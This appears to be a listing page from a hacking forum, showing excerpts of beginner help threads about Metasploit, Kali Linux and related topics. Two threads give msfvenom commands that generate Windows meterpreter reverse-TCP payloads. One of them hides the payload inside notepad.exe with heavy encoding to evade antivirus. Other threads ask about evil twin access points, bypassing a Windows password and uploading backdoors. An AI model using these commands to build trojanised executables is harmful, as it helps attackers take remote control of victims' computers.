Null Byte Forum

Forum Thread: Problem with Public IP and Working Outside LAN

I've tried several times making a payload and delivering it to one of my local PC's with my private IP on both the listener and the virus (msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.xx) . But, if I set my public IP when using msfvenom (I've made sure that the port 4444 which I'm using is open) the listener never gets a signal. It can't open a session. The port appears to be open when I start listening and then try a webpage like http://ping.eu/port-chk/ .

Forum Thread: HASKELL OR PYTHON FOR FIRST LANGUAGE

Should I learn Python or Haskell in terms of hacking is there anything that Python will be able to do that I can't do with Haskell to build exploits? I am pretty much a noob hacker and am wondering which one I should learn first. I plan to learn Haskell but would it be benefitial to start with Python?

Forum Thread: MSFVenom Issues

I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.144 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my computer and run it I don't get a response from the file. I do have a handler running with said payload.

RoboBook : Introduction Part 1

Hey guys, As you may already know, Phoenix750 made a series on Electricity and Electronics. So, speaking about electronics, I decided I will make a tutorial series on robots, what they are and how to make them. What I do hope to cover in these tutorials are:-

Forum Thread: Txpower Help

Trying to simulate an evil twin AP scenario with Kali and I'm unable to boost the power of my wifi card. I've tried this on my internal card and also on an alfa card with the same unresponsive results:

Forum Thread: How to Bypass Windows 7 Password?

We know there r several ways to Bypass Windows 7 password. But all of this either need any software or Windows CD.Can you please tell me how to Bypass Windows 7 password without any CD or Software?I mean when Windows boot up if we press shift 5 times the cmd line come up, can we bypass the password or reset the password from that cmd line without any CD or any software? Just trying some kind of commands....

Forum Thread: WAN Hacking

OK,so i have successfully hacked on Lan before using msfvenom,but when i try WAN i have no luck,the only setting i change is when setting up the payload,i change LHOST to my public ip,and i have forwarded the port im listening on.Please help?

Forum Thread: Meterpreter Error!!

I am not getting the reason behind the error, when i try to upload a specified backdoor. the path mentioned in the command is correct as you'll can see the backdoor itself in on the Desktop. Please Do help Solve this..

Forum Thread: Kali Linux - Desktop Files Wiped

Booted up Kali Linux, started msfconsole , went for windows/meterpreter/reversetcp , setted all options , done the job , exited and noticed all files from Desktop got removed , tried locate lost folders no luck , tried find . fileName , no luck , all files and folders were removed from Rooted Users Desktop, where as other account was untouched.

Forum Thread: Virtualbox Kali Bridged Connection Issue

Hey guys, I want to use the Bridged Connection Option with Kali 1.1.0a in Virtualbox. I am currently utilizing a Macbook Pro (Early 2011 Model) running OSX El Capitan. The version of Virtualbox installed on my Mac is 5.0.12 r104815. I have done a lot of different tests to try to pinpoint the issue, including: